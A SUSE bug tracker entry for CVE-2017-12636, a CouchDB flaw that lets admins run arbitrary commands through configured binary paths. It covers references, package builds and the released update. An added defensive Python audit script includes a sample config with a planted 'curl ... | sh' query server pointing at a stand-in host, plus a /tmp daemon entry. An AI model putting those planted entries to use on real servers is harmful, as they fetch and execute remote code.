Bug 1068386 - (CVE-2017-12636) VUL-0: CVE-2017-12636: couchdb: CouchDB administrative users can configure the database server via HTTP(S). Some of the configuration options include paths for operating system-level binaries that are subsequently launched by CouchDB. This
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Priority: P3 - Medium
Severity: Major
Assigned To: Security Team bot
https://smash.suse.de/issue/194964/
CVSSv3:SUSE:CVE-2017-12635:8.1:(AV:N/...
Reported: 2017-11-16 07:21 UTC by Marcus Meissner
Modified: 2020-09-24 13:31 UTC (History)
Found By: Security Response Team
Description Marcus Meissner 2017-11-16 07:21:22 UTC
CVE-2017-12636

CouchDB administrative users can configure the database server via HTTP(S). Some
of the configuration options include paths for operating system-level binaries
that are subsequently launched by CouchDB. This allows an admin user in Apache
CouchDB before 1.7.0 and 2.x before 2.1.1 to execute arbitrary shell commands as
the CouchDB user, including downloading and executing scripts from the public
internet.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12636
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635
http://seclists.org/oss-sec/2017/q4/279
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635
https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E
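As an added example (not part of this bug report and not CouchDB's own code), the following Python audit walks a CouchDB 1.x `_config` dump and flags the launchable-binary settings the description refers to, so a defender can spot a redirected helper before it is executed; the section names, the trusted directories and the sample dump are assumptions constructed for the example.

```python
"""Audit a CouchDB 1.x configuration dump for launchable-binary settings an
admin could have redirected (the CVE-2017-12636 vector). Added example, not
CouchDB code. Assumptions: the dump is the JSON from GET /_config (section ->
key -> value); BINARY_SECTIONS and TRUSTED_DIRS are assumed, not from the page."""
import json
import shlex

BINARY_SECTIONS = ("query_servers", "os_daemons", "external", "update_notification")
TRUSTED_DIRS = ("/usr/bin/", "/usr/lib/couchdb/", "/usr/libexec/couchdb/")
SHELL_METACHARS = set("|;&$`<>")

def classify_command(value):
    """Return why a configured command line looks unsafe, or None if it does not."""
    if any(c in SHELL_METACHARS for c in value):
        return "shell metacharacters in command line"
    try:
        argv = shlex.split(value)
    except ValueError:
        return "unparsable command line"
    if not argv:
        return "empty command"
    program = argv[0]
    if not program.startswith("/"):
        return "relative program path (resolved via PATH)"
    if not program.startswith(TRUSTED_DIRS):
        return "program outside trusted directories"
    return None

def audit_config(config):
    """Return (section, key, value, reason) for every suspicious entry."""
    findings = []
    for section in BINARY_SECTIONS:
        for key, value in config.get(section, {}).items():
            reason = classify_command(value)
            if reason:
                findings.append((section, key, value, reason))
    return findings

# Constructed sample of a GET /_config response: the stock query server plus
# two entries of the kind an attacker holding admin credentials could plant.
SAMPLE_CONFIG = json.loads("""{
  "query_servers": {
    "javascript": "/usr/bin/couchjs /usr/share/couchdb/server/main.js",
    "cmd": "/bin/sh -c 'curl http://example.invalid/s | sh'"
  },
  "os_daemons": {"updater": "/tmp/upd.sh"},
  "httpd": {"port": "5984", "bind_address": "127.0.0.1"}
}""")
```

Feeding `audit_config` the live `_config` output of an instance, or diffing it against a known-good dump, turns the vector described above into a routine check rather than a post-incident discovery.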
Comment 2 Keith Berger 2018-03-23 14:16:55 UTC
https://trello.com/c/I1KCfwb2
Comment 3 Jiří Suchomel 2018-03-26 11:02:59 UTC
So, building the 1.7.1 version is not difficult:

https://build.suse.de/package/show/home:jsuchome:branches:Devel:Cloud:8/couchdb
Comment 4 Jiří Suchomel 2018-03-27 12:39:08 UTC
SR for Cloud8: https://build.suse.de/request/show/160311
Comment 6 Jiří Suchomel 2018-03-28 07:52:10 UTC
SR for SOC7: https://build.suse.de/request/show/160449
Comment 7 Jiří Suchomel 2018-04-04 09:24:55 UTC
Cloud packages updated
Comment 9 Jiří Suchomel 2018-07-24 15:21:33 UTC
Created a maintenance request; I hope it's correct this way:

https://build.suse.de/request/show/168824
Comment 13 Swamp Workflow Management 2018-08-31 16:13:29 UTC
SUSE-SU-2018:2578-1: An update that fixes two vulnerabilities is now available.

Category: security (important)
Bug References: 1068386,1100973
CVE References: CVE-2017-12636,CVE-2018-8007
Sources used:
SUSE OpenStack Cloud 7 (src):    couchdb-1.7.2-2.8.2
SUSE Enterprise Storage 4 (src):    couchdb-1.7.2-2.8.2
Comment 14 Wolfgang Frisch 2020-09-24 13:31:40 UTC
Released.